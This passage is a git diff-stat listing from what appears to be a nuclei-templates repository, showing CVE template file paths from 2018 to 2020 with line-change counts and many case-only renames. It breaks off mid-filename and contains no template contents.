nuclei-templates/CVE-2018/CVE-2018-14502.yaml | 39 +- nuclei-templates/CVE-2018/CVE-2018-14574.yaml | 36 + nuclei-templates/CVE-2018/CVE-2018-14918.yaml | 50 + nuclei-templates/CVE-2018/CVE-2018-15138.yaml | 36 - nuclei-templates/CVE-2018/CVE-2018-15473.yaml | 12 +- ...ve-2018-15517.yaml => CVE-2018-15517.yaml} | 0 ...ve-2018-15640.yaml => CVE-2018-15640.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-15657.yaml | 2 - ...ve-2018-15745.yaml => CVE-2018-15745.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-15917.yaml | 9 +- nuclei-templates/CVE-2018/CVE-2018-15961.yaml | 71 - ...ve-2018-16059.yaml => CVE-2018-16059.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-16139.yaml | 19 +- nuclei-templates/CVE-2018/CVE-2018-16159.yaml | 10 +- 
nuclei-templates/CVE-2018/CVE-2018-16167.yaml | 13 +- ...ve-2018-16288.yaml => CVE-2018-16288.yaml} | 0 ...ve-2018-16299.yaml => CVE-2018-16299.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-16670.yaml | 5 - ...ve-2018-16763.yaml => CVE-2018-16763.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-16979.yaml | 22 +- nuclei-templates/CVE-2018/CVE-2018-17153.yaml | 19 +- ...ve-2018-17246.yaml => CVE-2018-17246.yaml} | 0 ...ve-2018-17254.yaml => CVE-2018-17254.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-17422.yaml | 34 - ...ve-2018-17431.yaml => CVE-2018-17431.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-18069.yaml | 32 - nuclei-templates/CVE-2018/CVE-2018-18264.yaml | 34 +- ...ve-2018-18323.yaml => CVE-2018-18323.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-18570.yaml | 8 +- nuclei-templates/CVE-2018/CVE-2018-18608.yaml | 46 - nuclei-templates/CVE-2018/CVE-2018-18778.yaml | 30 + nuclei-templates/CVE-2018/CVE-2018-18809.yaml | 10 +- nuclei-templates/CVE-2018/CVE-2018-19137.yaml | 24 +- nuclei-templates/CVE-2018/CVE-2018-19287.yaml | 26 +- nuclei-templates/CVE-2018/CVE-2018-19386.yaml | 31 + nuclei-templates/CVE-2018/CVE-2018-19439.yaml | 14 +- ...ve-2018-19458.yaml => CVE-2018-19458.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-19518.yaml | 41 - nuclei-templates/CVE-2018/CVE-2018-19749.yaml | 54 - nuclei-templates/CVE-2018/CVE-2018-19751.yaml | 62 - nuclei-templates/CVE-2018/CVE-2018-19752.yaml | 31 +- ...ve-2018-19753.yaml => CVE-2018-19753.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-19877.yaml | 35 + nuclei-templates/CVE-2018/CVE-2018-19892.yaml | 61 - nuclei-templates/CVE-2018/CVE-2018-19914.yaml | 46 + nuclei-templates/CVE-2018/CVE-2018-19915.yaml | 54 - nuclei-templates/CVE-2018/CVE-2018-20009.yaml | 54 - nuclei-templates/CVE-2018/CVE-2018-20010.yaml | 54 - nuclei-templates/CVE-2018/CVE-2018-20011.yaml | 47 + nuclei-templates/CVE-2018/CVE-2018-20463.yaml | 25 +- nuclei-templates/CVE-2018/CVE-2018-20470.yaml | 23 +- nuclei-templates/CVE-2018/CVE-2018-20526.yaml | 35 +- 
nuclei-templates/CVE-2018/CVE-2018-20608.yaml | 11 +- ...{cve-2018-2392.yaml => CVE-2018-2392.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-3810.yaml | 30 - ...{cve-2018-5316.yaml => CVE-2018-5316.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-5715.yaml | 17 +- nuclei-templates/CVE-2018/CVE-2018-6184.yaml | 10 +- nuclei-templates/CVE-2018/CVE-2018-6530.yaml | 16 +- ...{cve-2018-6910.yaml => CVE-2018-6910.yaml} | 0 ...{cve-2018-7251.yaml => CVE-2018-7251.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-7282.yaml | 8 +- nuclei-templates/CVE-2018/CVE-2018-7467.yaml | 2 +- nuclei-templates/CVE-2018/CVE-2018-7490.yaml | 18 - nuclei-templates/CVE-2018/CVE-2018-7653.yaml | 8 +- nuclei-templates/CVE-2018/CVE-2018-7700.yaml | 29 - ...{cve-2018-7719.yaml => CVE-2018-7719.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-8727.yaml | 28 - nuclei-templates/CVE-2018/CVE-2018-9118.yaml | 13 +- nuclei-templates/CVE-2018/CVE-2018-9161.yaml | 48 + ...{cve-2018-9205.yaml => CVE-2018-9205.yaml} | 0 ...{cve-2018-9995.yaml => CVE-2018-9995.yaml} | 0 .../CVE-2018/cve-2018-1000226.yaml | 34 +- .../CVE-2018/cve-2018-1000671.yaml | 33 - ...018-1000856.yaml => cve-2018-1000856.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-10230.yaml | 16 +- nuclei-templates/CVE-2018/cve-2018-10956.yaml | 27 +- ...VE-2018-11510.yaml => cve-2018-11510.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-11709.yaml | 35 + ...VE-2018-11759.yaml => cve-2018-11759.yaml} | 0 ...VE-2018-12031.yaml => cve-2018-12031.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-12300.yaml | 28 - nuclei-templates/CVE-2018/cve-2018-1247.yaml | 1 + ...VE-2018-12613.yaml => cve-2018-12613.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-12675.yaml | 34 - ...{CVE-2018-1273.yaml => cve-2018-1273.yaml} | 0 ...{CVE-2018-1335.yaml => cve-2018-1335.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-13980.yaml | 32 + nuclei-templates/CVE-2018/cve-2018-14064.yaml | 33 + nuclei-templates/CVE-2018/cve-2018-14574.yaml | 23 - nuclei-templates/CVE-2018/cve-2018-14918.yaml | 39 - 
nuclei-templates/CVE-2018/cve-2018-15138.yaml | 32 + nuclei-templates/CVE-2018/cve-2018-15961.yaml | 65 + nuclei-templates/CVE-2018/cve-2018-16341.yaml | 6 +- ...VE-2018-16671.yaml => cve-2018-16671.yaml} | 0 ...VE-2018-16716.yaml => cve-2018-16716.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-16761.yaml | 20 +- nuclei-templates/CVE-2018/cve-2018-16836.yaml | 18 +- nuclei-templates/CVE-2018/cve-2018-17422.yaml | 46 + nuclei-templates/CVE-2018/cve-2018-18069.yaml | 27 + nuclei-templates/CVE-2018/cve-2018-18608.yaml | 56 + ...VE-2018-18777.yaml => cve-2018-18777.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-18778.yaml | 31 - ...VE-2018-18925.yaml => cve-2018-18925.yaml} | 0 ...VE-2018-19136.yaml => cve-2018-19136.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-19365.yaml | 31 +- nuclei-templates/CVE-2018/cve-2018-19386.yaml | 28 - nuclei-templates/CVE-2018/cve-2018-19749.yaml | 61 + nuclei-templates/CVE-2018/cve-2018-19751.yaml | 69 + nuclei-templates/CVE-2018/cve-2018-19877.yaml | 43 - nuclei-templates/CVE-2018/cve-2018-19892.yaml | 69 + nuclei-templates/CVE-2018/cve-2018-19914.yaml | 54 - nuclei-templates/CVE-2018/cve-2018-19915.yaml | 61 + nuclei-templates/CVE-2018/cve-2018-20009.yaml | 59 + nuclei-templates/CVE-2018/cve-2018-20010.yaml | 60 + nuclei-templates/CVE-2018/cve-2018-20011.yaml | 54 - ...VE-2018-20985.yaml => cve-2018-20985.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-3810.yaml | 43 + ...{CVE-2018-5233.yaml => cve-2018-5233.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-7490.yaml | 32 + ...{CVE-2018-7600.yaml => cve-2018-7600.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-7602.yaml | 45 +- nuclei-templates/CVE-2018/cve-2018-7662.yaml | 30 +- nuclei-templates/CVE-2018/cve-2018-7700.yaml | 33 + ...{CVE-2018-8006.yaml => cve-2018-8006.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-8727.yaml | 30 + nuclei-templates/CVE-2018/cve-2018-9161.yaml | 34 - ...{CVE-2018-9845.yaml => cve-2018-9845.yaml} | 0 ...{cve-2019-0193.yaml => CVE-2019-0193.yaml} | 0 
nuclei-templates/CVE-2019/CVE-2019-0221.yaml | 19 +- ...{cve-2019-0230.yaml => CVE-2019-0230.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-10098.yaml | 6 +- .../CVE-2019/CVE-2019-1010287.yaml | 36 - nuclei-templates/CVE-2019/CVE-2019-10405.yaml | 42 +- ...ve-2019-10475.yaml => CVE-2019-10475.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-10692.yaml | 23 +- nuclei-templates/CVE-2019/CVE-2019-10717.yaml | 43 - nuclei-templates/CVE-2019/CVE-2019-10758.yaml | 47 + nuclei-templates/CVE-2019/CVE-2019-11013.yaml | 29 - nuclei-templates/CVE-2019/CVE-2019-11043.yaml | 18 + nuclei-templates/CVE-2019/CVE-2019-12276.yaml | 68 +- ...ve-2019-12314.yaml => CVE-2019-12314.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-12581.yaml | 45 - nuclei-templates/CVE-2019/CVE-2019-12616.yaml | 45 - nuclei-templates/CVE-2019/CVE-2019-12962.yaml | 49 - nuclei-templates/CVE-2019/CVE-2019-12985.yaml | 12 +- nuclei-templates/CVE-2019/CVE-2019-12986.yaml | 12 +- nuclei-templates/CVE-2019/CVE-2019-12987.yaml | 12 +- nuclei-templates/CVE-2019/CVE-2019-12988.yaml | 12 +- nuclei-templates/CVE-2019/CVE-2019-12990.yaml | 9 +- nuclei-templates/CVE-2019/CVE-2019-13101.yaml | 68 +- nuclei-templates/CVE-2019/CVE-2019-13396.yaml | 63 + ...ve-2019-14205.yaml => CVE-2019-14205.yaml} | 0 ...ve-2019-14223.yaml => CVE-2019-14223.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-14251.yaml | 31 + ...ve-2019-14322.yaml => CVE-2019-14322.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-14530.yaml | 31 +- nuclei-templates/CVE-2019/CVE-2019-14750.yaml | 159 +- nuclei-templates/CVE-2019/CVE-2019-14789.yaml | 8 +- nuclei-templates/CVE-2019/CVE-2019-14974.yaml | 20 - ...ve-2019-15107.yaml => CVE-2019-15107.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-15501.yaml | 5 + nuclei-templates/CVE-2019/CVE-2019-15642.yaml | 8 +- nuclei-templates/CVE-2019/CVE-2019-15829.yaml | 6 +- ...ve-2019-15858.yaml => CVE-2019-15858.yaml} | 0 ...ve-2019-15859.yaml => CVE-2019-15859.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-15889.yaml | 15 +- 
nuclei-templates/CVE-2019/CVE-2019-16057.yaml | 8 +- ...ve-2019-16097.yaml => CVE-2019-16097.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-16278.yaml | 56 +- ...ve-2019-16313.yaml => CVE-2019-16313.yaml} | 0 ...{cve-2019-1653.yaml => CVE-2019-1653.yaml} | 0 ...ve-2019-16662.yaml => CVE-2019-16662.yaml} | 0 ...ve-2019-16759.yaml => CVE-2019-16759.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-16920.yaml | 40 +- nuclei-templates/CVE-2019/CVE-2019-16931.yaml | 2 +- nuclei-templates/CVE-2019/CVE-2019-16996.yaml | 28 +- ...ve-2019-17270.yaml => CVE-2019-17270.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-17382.yaml | 18 - nuclei-templates/CVE-2019/CVE-2019-17418.yaml | 33 +- nuclei-templates/CVE-2019/CVE-2019-17444.yaml | 39 - ...ve-2019-17506.yaml => CVE-2019-17506.yaml} | 0 ...ve-2019-17538.yaml => CVE-2019-17538.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-17574.yaml | 12 +- nuclei-templates/CVE-2019/CVE-2019-17662.yaml | 11 +- nuclei-templates/CVE-2019/CVE-2019-1821.yaml | 50 - nuclei-templates/CVE-2019/CVE-2019-18371.yaml | 31 + ...ve-2019-18394.yaml => CVE-2019-18394.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-18665.yaml | 30 + nuclei-templates/CVE-2019/CVE-2019-18818.yaml | 49 - nuclei-templates/CVE-2019/CVE-2019-18957.yaml | 20 +- nuclei-templates/CVE-2019/CVE-2019-1898.yaml | 6 +- nuclei-templates/CVE-2019/CVE-2019-1943.yaml | 8 +- nuclei-templates/CVE-2019/CVE-2019-20085.yaml | 18 +- ...{cve-2019-2725.yaml => CVE-2019-2725.yaml} | 0 ...{cve-2019-2729.yaml => CVE-2019-2729.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-2767.yaml | 8 +- nuclei-templates/CVE-2019/CVE-2019-3398.yaml | 10 +- nuclei-templates/CVE-2019/CVE-2019-3401.yaml | 32 - nuclei-templates/CVE-2019/CVE-2019-3402.yaml | 29 + ...{cve-2019-3799.yaml => CVE-2019-3799.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-3911.yaml | 30 +- nuclei-templates/CVE-2019/CVE-2019-3912.yaml | 29 - nuclei-templates/CVE-2019/CVE-2019-3929.yaml | 13 +- ...{cve-2019-5127.yaml => CVE-2019-5127.yaml} | 0 
nuclei-templates/CVE-2019/CVE-2019-5434.yaml | 10 +- ...{cve-2019-6715.yaml => CVE-2019-6715.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-6799.yaml | 10 +- nuclei-templates/CVE-2019/CVE-2019-6802.yaml | 31 +- nuclei-templates/CVE-2019/CVE-2019-7219.yaml | 33 - nuclei-templates/CVE-2019/CVE-2019-7238.yaml | 21 - nuclei-templates/CVE-2019/CVE-2019-7255.yaml | 20 +- nuclei-templates/CVE-2019/CVE-2019-7315.yaml | 8 +- nuclei-templates/CVE-2019/CVE-2019-7543.yaml | 9 +- nuclei-templates/CVE-2019/CVE-2019-8086.yaml | 21 +- nuclei-templates/CVE-2019/CVE-2019-8390.yaml | 6 +- ...{cve-2019-8446.yaml => CVE-2019-8446.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-8449.yaml | 29 - ...{cve-2019-8451.yaml => CVE-2019-8451.yaml} | 0 ...{cve-2019-8903.yaml => CVE-2019-8903.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-9915.yaml | 32 + nuclei-templates/CVE-2019/CVE-2019-9922.yaml | 28 + ...VE-2019-10068.yaml => cve-2019-10068.yaml} | 0 .../CVE-2019/cve-2019-1010287.yaml | 38 + nuclei-templates/CVE-2019/cve-2019-10717.yaml | 54 + nuclei-templates/CVE-2019/cve-2019-10758.yaml | 35 - nuclei-templates/CVE-2019/cve-2019-11013.yaml | 32 + nuclei-templates/CVE-2019/cve-2019-11043.yaml | 21 - nuclei-templates/CVE-2019/cve-2019-11370.yaml | 22 +- ...VE-2019-12461.yaml => cve-2019-12461.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-12581.yaml | 55 + nuclei-templates/CVE-2019/cve-2019-12583.yaml | 21 +- nuclei-templates/CVE-2019/cve-2019-12616.yaml | 39 + nuclei-templates/CVE-2019/cve-2019-12962.yaml | 56 + ...VE-2019-13392.yaml => cve-2019-13392.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-13396.yaml | 40 - nuclei-templates/CVE-2019/cve-2019-14251.yaml | 38 - ...VE-2019-14470.yaml => cve-2019-14470.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-14974.yaml | 29 + ...VE-2019-15043.yaml => cve-2019-15043.yaml} | 0 ...VE-2019-15811.yaml => cve-2019-15811.yaml} | 0 ...VE-2019-16332.yaml => cve-2019-16332.yaml} | 0 ...VE-2019-16932.yaml => cve-2019-16932.yaml} | 0 
nuclei-templates/CVE-2019/cve-2019-17382.yaml | 37 + nuclei-templates/CVE-2019/cve-2019-17444.yaml | 56 + ...VE-2019-17558.yaml => cve-2019-17558.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-1821.yaml | 51 + nuclei-templates/CVE-2019/cve-2019-18371.yaml | 35 - nuclei-templates/CVE-2019/cve-2019-18665.yaml | 37 - nuclei-templates/CVE-2019/cve-2019-18818.yaml | 52 + ...VE-2019-19134.yaml => cve-2019-19134.yaml} | 0 ...VE-2019-19781.yaml => cve-2019-19781.yaml} | 0 ...VE-2019-19908.yaml => cve-2019-19908.yaml} | 0 ...VE-2019-20141.yaml => cve-2019-20141.yaml} | 0 ...VE-2019-20210.yaml => cve-2019-20210.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-20224.yaml | 26 +- ...VE-2019-20354.yaml => cve-2019-20354.yaml} | 0 ...VE-2019-20933.yaml => cve-2019-20933.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-3401.yaml | 33 + nuclei-templates/CVE-2019/cve-2019-3402.yaml | 21 - nuclei-templates/CVE-2019/cve-2019-3912.yaml | 43 + nuclei-templates/CVE-2019/cve-2019-6340.yaml | 28 +- nuclei-templates/CVE-2019/cve-2019-7192.yaml | 92 +- nuclei-templates/CVE-2019/cve-2019-7219.yaml | 37 + nuclei-templates/CVE-2019/cve-2019-7238.yaml | 37 + ...{CVE-2019-7275.yaml => cve-2019-7275.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-8449.yaml | 30 + ...{CVE-2019-9726.yaml => cve-2019-9726.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-9915.yaml | 38 - nuclei-templates/CVE-2019/cve-2019-9922.yaml | 36 - nuclei-templates/CVE-2020/CVE-2020-10124.yaml | 3 +- nuclei-templates/CVE-2020/CVE-2020-10220.yaml | 21 - ...ve-2020-10546.yaml => CVE-2020-10546.yaml} | 0 ...ve-2020-10547.yaml => CVE-2020-10547.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-10770.yaml | 26 - nuclei-templates/CVE-2020/CVE-2020-10973.yaml | 19 +- nuclei-templates/CVE-2020/CVE-2020-11110.yaml | 12 +- nuclei-templates/CVE-2020/CVE-2020-11450.yaml | 20 +- ...ve-2020-11455.yaml => CVE-2020-11455.yaml} | 0 ...ve-2020-11546.yaml => CVE-2020-11546.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-11798.yaml | 10 +- 
nuclei-templates/CVE-2020/CVE-2020-11854.yaml | 37 + nuclei-templates/CVE-2020/CVE-2020-11930.yaml | 35 - nuclei-templates/CVE-2020/CVE-2020-11981.yaml | 38 +- nuclei-templates/CVE-2020/CVE-2020-11991.yaml | 44 - nuclei-templates/CVE-2020/CVE-2020-12127.yaml | 19 +- nuclei-templates/CVE-2020/CVE-2020-12256.yaml | 72 +- nuclei-templates/CVE-2020/CVE-2020-12259.yaml | 30 - nuclei-templates/CVE-2020/CVE-2020-12447.yaml | 45 + nuclei-templates/CVE-2020/CVE-2020-12478.yaml | 22 +- ...ve-2020-12720.yaml => CVE-2020-12720.yaml} | 0 ...ve-2020-12800.yaml => CVE-2020-12800.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-13121.yaml | 22 +- nuclei-templates/CVE-2020/CVE-2020-13258.yaml | 18 +- nuclei-templates/CVE-2020/CVE-2020-13379.yaml | 61 +- nuclei-templates/CVE-2020/CVE-2020-13405.yaml | 47 - nuclei-templates/CVE-2020/CVE-2020-13483.yaml | 36 - nuclei-templates/CVE-2020/CVE-2020-13638.yaml | 7 +- ...ve-2020-13700.yaml => CVE-2020-13700.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-13820.yaml | 20 +- nuclei-templates/CVE-2020/CVE-2020-13851.yaml | 9 +- ...ve-2020-13937.yaml => CVE-2020-13937.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-14144.yaml | 10 +- ...ve-2020-14179.yaml => CVE-2020-14179.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-14408.yaml | 15 +- nuclei-templates/CVE-2020/CVE-2020-14864.yaml | 2 +- ...ve-2020-15148.yaml => CVE-2020-15148.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-15505.yaml | 40 - nuclei-templates/CVE-2020/CVE-2020-15867.yaml | 8 +- nuclei-templates/CVE-2020/CVE-2020-15895.yaml | 23 +- ...ve-2020-16139.yaml => CVE-2020-16139.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-16920.yaml | 59 - ...ve-2020-16952.yaml => CVE-2020-16952.yaml} | 0 ...ve-2020-17362.yaml => CVE-2020-17362.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-17456.yaml | 37 +- nuclei-templates/CVE-2020/CVE-2020-17463.yaml | 10 +- ...ve-2020-17518.yaml => CVE-2020-17518.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-17526.yaml | 32 +- nuclei-templates/CVE-2020/CVE-2020-17530.yaml | 15 +- 
nuclei-templates/CVE-2020/CVE-2020-18268.yaml | 50 + nuclei-templates/CVE-2020/CVE-2020-19282.yaml | 33 - ...{cve-2020-1938.yaml => CVE-2020-1938.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-19515.yaml | 8 +- nuclei-templates/CVE-2020/CVE-2020-1956.yaml | 27 - nuclei-templates/CVE-2020/CVE-2020-19625.yaml | 34 + nuclei-templates/CVE-2020/CVE-2020-20285.yaml | 19 +- nuclei-templates/CVE-2020/CVE-2020-20300.yaml | 23 +- ...{cve-2020-2096.yaml => CVE-2020-2096.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-20988.yaml | 43 + nuclei-templates/CVE-2020/CVE-2020-21012.yaml | 20 +- nuclei-templates/CVE-2020/CVE-2020-2103.yaml | 56 - nuclei-templates/CVE-2020/CVE-2020-2199.yaml | 23 - nuclei-templates/CVE-2020/CVE-2020-22208.yaml | 24 +- nuclei-templates/CVE-2020/CVE-2020-22210.yaml | 26 - nuclei-templates/CVE-2020/CVE-2020-22211.yaml | 4 - nuclei-templates/CVE-2020/CVE-2020-23015.yaml | 28 - nuclei-templates/CVE-2020/CVE-2020-23517.yaml | 26 - nuclei-templates/CVE-2020/CVE-2020-23697.yaml | 29 +- nuclei-templates/CVE-2020/CVE-2020-23972.yaml | 6 +- nuclei-templates/CVE-2020/CVE-2020-24589.yaml | 38 - nuclei-templates/CVE-2020/CVE-2020-24701.yaml | 7 +- nuclei-templates/CVE-2020/CVE-2020-24765.yaml | 9 +- nuclei-templates/CVE-2020/CVE-2020-24902.yaml | 23 +- nuclei-templates/CVE-2020/CVE-2020-24903.yaml | 21 +- nuclei-templates/CVE-2020/CVE-2020-25506.yaml | 15 +- nuclei-templates/CVE-2020/CVE-2020-26217.yaml | 15 +- nuclei-templates/CVE-2020/CVE-2020-26248.yaml | 21 +- nuclei-templates/CVE-2020/CVE-2020-26258.yaml | 10 +- nuclei-templates/CVE-2020/CVE-2020-26919.yaml | 9 +- nuclei-templates/CVE-2020/CVE-2020-27191.yaml | 27 +- nuclei-templates/CVE-2020/CVE-2020-2733.yaml | 21 +- ...ve-2020-27361.yaml => CVE-2020-27361.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-27481.yaml | 10 +- nuclei-templates/CVE-2020/CVE-2020-28185.yaml | 39 +- ...ve-2020-28188.yaml => CVE-2020-28188.yaml} | 0 ...ve-2020-28208.yaml => CVE-2020-28208.yaml} | 0 
nuclei-templates/CVE-2020/CVE-2020-28351.yaml | 31 - nuclei-templates/CVE-2020/CVE-2020-28871.yaml | 16 +- nuclei-templates/CVE-2020/CVE-2020-29284.yaml | 20 +- ...ve-2020-29395.yaml => CVE-2020-29395.yaml} | 0 ...ve-2020-29453.yaml => CVE-2020-29453.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-29583.yaml | 6 +- nuclei-templates/CVE-2020/CVE-2020-29597.yaml | 25 +- ...{cve-2020-3187.yaml => CVE-2020-3187.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-35338.yaml | 33 - ...ve-2020-35476.yaml => CVE-2020-35476.yaml} | 0 ...ve-2020-35580.yaml => CVE-2020-35580.yaml} | 0 ...ve-2020-35598.yaml => CVE-2020-35598.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-35749.yaml | 37 - ...ve-2020-35848.yaml => CVE-2020-35848.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-35984.yaml | 6 +- nuclei-templates/CVE-2020/CVE-2020-35985.yaml | 8 +- nuclei-templates/CVE-2020/CVE-2020-35986.yaml | 6 +- nuclei-templates/CVE-2020/CVE-2020-35987.yaml | 6 +- nuclei-templates/CVE-2020/CVE-2020-36287.yaml | 31 + nuclei-templates/CVE-2020/CVE-2020-36289.yaml | 10 +- nuclei-templates/CVE-2020/CVE-2020-36365.yaml | 43 + nuclei-templates/CVE-2020/CVE-2020-36510.yaml | 45 +- nuclei-templates/CVE-2020/CVE-2020-3952.yaml | 5 +- nuclei-templates/CVE-2020/CVE-2020-5191.yaml | 22 +- nuclei-templates/CVE-2020/CVE-2020-5192.yaml | 25 +- nuclei-templates/CVE-2020/CVE-2020-5307.yaml | 35 - ...{cve-2020-5410.yaml => CVE-2020-5410.yaml} | 0 ...{cve-2020-5775.yaml => CVE-2020-5775.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-5776.yaml | 7 +- ...{cve-2020-5847.yaml => CVE-2020-5847.yaml} | 0 ...{cve-2020-6207.yaml => CVE-2020-6207.yaml} | 0 ...{cve-2020-6308.yaml => CVE-2020-6308.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-6950.yaml | 8 +- ...{cve-2020-7048.yaml => CVE-2020-7048.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-7107.yaml | 23 +- ...{cve-2020-7209.yaml => CVE-2020-7209.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-7247.yaml | 41 - ...{cve-2020-7796.yaml => CVE-2020-7796.yaml} | 0 
nuclei-templates/CVE-2020/CVE-2020-7943.yaml | 38 - nuclei-templates/CVE-2020/CVE-2020-8091.yaml | 2 +- ...{cve-2020-8115.yaml => CVE-2020-8115.yaml} | 0 ...{cve-2020-8163.yaml => CVE-2020-8163.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-8193.yaml | 22 +- ...{cve-2020-8209.yaml => CVE-2020-8209.yaml} | 0 ...{cve-2020-8497.yaml => CVE-2020-8497.yaml} | 0 ...{cve-2020-8512.yaml => CVE-2020-8512.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-8515.yaml | 40 - nuclei-templates/CVE-2020/CVE-2020-8615.yaml | 8 +- nuclei-templates/CVE-2020/CVE-2020-8654.yaml | 16 +- nuclei-templates/CVE-2020/CVE-2020-8771.yaml | 54 - ...{cve-2020-8813.yaml => CVE-2020-8813.yaml} | 0 ...{cve-2020-9036.yaml => CVE-2020-9036.yaml} | 0 ...{cve-2020-9054.yaml => CVE-2020-9054.yaml} | 0 ...{cve-2020-9315.yaml => CVE-2020-9315.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-9402.yaml | 23 - nuclei-templates/CVE-2020/CVE-2020-9496.yaml | 42 - nuclei-templates/CVE-2020/cve-2020-10199.yaml | 24 + nuclei-templates/CVE-2020/cve-2020-10220.yaml | 52 + nuclei-templates/CVE-2020/cve-2020-10548.yaml | 12 +- nuclei-templates/CVE-2020/cve-2020-10770.yaml | 28 + ...{CVE-2020-1147.yaml => cve-2020-1147.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-11710.yaml | 14 +- nuclei-templates/CVE-2020/cve-2020-11854.yaml | 30 - nuclei-templates/CVE-2020/cve-2020-11930.yaml | 36 + ...VE-2020-11978.yaml => cve-2020-11978.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-11991.yaml | 40 + nuclei-templates/CVE-2020/cve-2020-12259.yaml | 54 + nuclei-templates/CVE-2020/cve-2020-12447.yaml | 31 - ...VE-2020-13158.yaml => cve-2020-13158.yaml} | 0 ...VE-2020-13167.yaml => cve-2020-13167.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-13405.yaml | 57 + nuclei-templates/CVE-2020/cve-2020-13483.yaml | 42 + ...VE-2020-13927.yaml => cve-2020-13927.yaml} | 0 ...VE-2020-14181.yaml => cve-2020-14181.yaml} | 0 ...VE-2020-14883.yaml => cve-2020-14883.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-15050.yaml | 26 +- ...VE-2020-15129.yaml => 
cve-2020-15129.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-15227.yaml | 34 + nuclei-templates/CVE-2020/cve-2020-15505.yaml | 42 + ...VE-2020-15920.yaml => cve-2020-15920.yaml} | 0 ...VE-2020-16846.yaml => cve-2020-16846.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-18268.yaml | 38 - nuclei-templates/CVE-2020/cve-2020-19282.yaml | 38 + ...VE-2020-19283.yaml => cve-2020-19283.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-1956.yaml | 60 + nuclei-templates/CVE-2020/cve-2020-19625.yaml | 28 - nuclei-templates/CVE-2020/cve-2020-20988.yaml | 49 - nuclei-templates/CVE-2020/cve-2020-2103.yaml | 67 + ...VE-2020-22209.yaml => cve-2020-22209.yaml} | 0 ...VE-2020-22840.yaml => cve-2020-22840.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-23015.yaml | 28 + nuclei-templates/CVE-2020/cve-2020-23517.yaml | 29 + ...VE-2020-23575.yaml => cve-2020-23575.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-24223.yaml | 21 +- ...VE-2020-24312.yaml => cve-2020-24312.yaml} | 0 ...VE-2020-24550.yaml => cve-2020-24550.yaml} | 0 ...VE-2020-24571.yaml => 